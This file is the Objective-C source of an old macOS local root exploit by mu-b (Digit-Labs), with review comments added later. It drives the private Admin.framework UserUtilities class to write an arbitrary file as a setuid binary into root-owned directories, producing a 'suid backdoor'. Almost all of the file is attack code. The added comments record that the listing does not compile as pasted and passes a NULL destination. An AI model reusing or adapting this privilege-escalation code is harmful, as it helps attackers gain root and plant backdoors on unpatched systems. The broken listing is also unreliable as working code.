/* osx-irony-assist.m
*
* Copyright (c) 2010 by <mu-b@digit-labs.org>
*
* Apple MACOS X < 10.9/10? local root exploit
* by mu-b - June 2010
*
* - Tested on: Apple MACOS X <= 10.8.X
*
* $Id: osx-irony-assist.m 16 2015-04-10 09:34:47Z mu-b $
*
* The most ironic backdoor perhaps in the history of backdoors.
* Enabling 'Assistive Devices' in the 'Universal Access' preferences pane
* uses this technique to drop a file ("/var/db/.AccessibilityAPIEnabled")
* in a directory,
*
* drwxr-xr-x 62 root wheel 2108 9 Apr 16:23 db
*
* without being root, now how did you do that?
*
* Copy what you want, wherever you want it, with whatever permissions you
* desire, hmmm, backdoor?
*
* This is now fixed, so I guess this is OK :-)
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2010!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#import <SecurityFoundation/SFAuthorization.h>
#import <Foundation/Foundation.h>
/* where you want to write it! */
#define BACKDOOR_BIN "/var/db/.AccessibilityAPIEnabled"
/* Copies the file at spath to dpath with a fixed POSIX mode by driving the
 * private Admin.framework classes "Authenticator" and "UserUtilities" by
 * name; neither class has a header imported here, which is why the
 * -Wobjc-method-access warning is suppressed around the create call below.
 *
 * spath: path of the file to copy; it is read whole into memory with NSData.
 * dpath: destination path, decoded as MacRoman into a CFString.
 * Returns EXIT_FAILURE if either class cannot be located or the source file
 * cannot be read; otherwise EXIT_SUCCESS once the create call and the
 * distributed notification have been issued (the create call's own result
 * is not examined).
 *
 * The mode 2377 (decimal) is 04511 octal, i.e. the setuid bit plus
 * rwx/--x/--x, which matches the "suid backdoor" message printed at the end.
 * From a defender's view the observable artefact of this technique is a
 * setuid file appearing in a root-owned directory (the header cites /var/db)
 * without a root writer; the header states the framework behaviour is fixed.
 */
int
do_assistive_copy(
const
char
*spath,
const
char
*dpath)
{
/* Manual pool; it is never drained in this function, so autoreleased
 * objects created below live until the process exits. */
NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
/* NOTE(review): userUtilsInstance is declared as a pointer to id, not an
 * id; see the (id *) cast after +alloc and the dereferencing send below. */
id authenticatorInstance, *userUtilsInstance;
Class authenticatorClass, userUtilsClass;
/* Only silences the unused-variable warning for pool. */
(
void
) pool;
NSBundle *adminBundle =
[NSBundle bundleWithPath:
@"/System/Library/PrivateFrameworks/Admin.framework"
];
/* Both classes are resolved by name at runtime; a NULL presumably means the
 * private framework no longer exposes them, e.g. on a fixed system. */
authenticatorClass = [adminBundle classNamed:
@"Authenticator"
];
if
(!authenticatorClass)
{
fprintf (stderr,
"* failed locating the Authenticator Class\n"
);
return
(EXIT_FAILURE);
}
printf (
"* Found Authenticator Class!\n"
);
/* performSelector: presumably because no imported header declares
 * +sharedAuthenticator; the returned object is used untyped. */
authenticatorInstance =
[authenticatorClass performSelector:@selector(sharedAuthenticator)];
userUtilsClass = [adminBundle classNamed:
@"UserUtilities"
];
if
(!userUtilsClass)
{
fprintf (stderr,
"* failed locating the UserUtilities Class\n"
);
return
(EXIT_FAILURE);
}
printf (
"* found UserUtilities Class!\n"
);
/* NOTE(review): +alloc with no -init, and the object pointer is stored
 * through an (id *) cast. The [*userUtilsInstance ...] send further down
 * therefore dereferences the object's first word and messages that value
 * rather than the object itself -- looks like it relies on that word being
 * the isa (the class); verify against the runtime in use. */
userUtilsInstance = (id *) [userUtilsClass alloc];
SFAuthorization *authObj = [SFAuthorization authorization];
/* The authentication result is cast from the id that performSelector:
 * returns, printed, and never tested: execution continues whatever it is. */
OSStatus isAuthed = (OSStatus)
[authenticatorInstance performSelector:@selector(authenticateUsingAuthorizationSync:)
withObject:authObj];
printf (
"* authenticateUsingAuthorizationSync:authObj returned: %i\n"
, isAuthed);
/* spath is decoded as ASCII; a non-ASCII path yields nil and the error
 * branch below is taken as if the file were unreadable. */
NSData *suidBin =
[NSData dataWithContentsOfFile:[NSString stringWithCString:spath
encoding:NSASCIIStringEncoding]];
if
(!suidBin)
{
fprintf (stderr,
"* could not create [NSDATA] suidBin!\n"
);
return
(EXIT_FAILURE);
}
/* Attributes for the new file: only NSFilePosixPermissions is set; no
 * owner/group key, so ownership is whatever the framework assigns. */
NSDictionary *createFileWithContentsDict =
[NSDictionary dictionaryWithObject:(id)[NSNumber numberWithShort:2377]
forKey:(id)NSFilePosixPermissions];
if
(!createFileWithContentsDict)
{
fprintf (stderr,
"* could not create [NSDictionary] createFileWithContentsDict!\n"
);
return
(EXIT_FAILURE);
}
/* Created with CFStringCreateWithCString and never CFRelease'd (leaked);
 * dpath is assumed non-NULL here, nothing checks it before the CF call. */
CFStringRef writePath =
CFStringCreateWithCString(NULL, dpath, kCFStringEncodingMacRoman);
/* The framework call that performs the write. The warning is suppressed
 * because createFileWithContents:path:attributes: is not declared in any
 * imported header; its return value is discarded. */
#pragma clang diagnostic push
#pragma clang diagnostic ignored "-Wobjc-method-access"
[*userUtilsInstance createFileWithContents:suidBin path:writePath
attributes:createFileWithContentsDict];
#pragma clang diagnostic pop
printf (
"* now execute suid backdoor at %s\n"
, dpath);
/* send the "Distributed Object Message" to the defaultCenter,
 * is this really necessary? (not for ownage)
 */
/* Presumably mirrors what the preferences pane posts when the setting is
 * toggled; the author's note above says the copy does not depend on it. */
[[NSDistributedNotificationCenter defaultCenter]
postNotificationName:
@"com.apple.accessibility.api"
object
:
@"system.preferences"
userInfo:nil
deliverImmediately:YES];
return
(EXIT_SUCCESS);
}
/* Entry point: prints the banner, requires at least one argument, then
 * delegates to do_assistive_copy with argv[1] as the source.
 *
 * NOTE(review): the banner printf call is not closed before the `if`
 * (there is no `);` after the second string literal), so this listing does
 * not compile as pasted.
 * NOTE(review): once the argc <= 1 check has passed, argc >= 2 is always
 * true, so BACKDOOR_BIN is never selected; when only <source> is given,
 * argv[2] is the NULL that terminates argv and is passed on as dpath.
 * NOTE(review): the usage path exits with EXIT_SUCCESS although it is an
 * error to the caller.
 */
int
main (
int
argc,
const
char
* argv[])
{
printf (
"Apple MACOS X < 10.9/10? local root exploit\n"
"by: <mu-b@digit-labs.org>\n"
if
(argc <= 1)
{
fprintf (stderr,
"Usage: %s <source> [destination]\n"
, argv[0]);
exit (EXIT_SUCCESS);
}
return
(do_assistive_copy(argv[1], argc >= 2 ? argv[2] : BACKDOOR_BIN));
}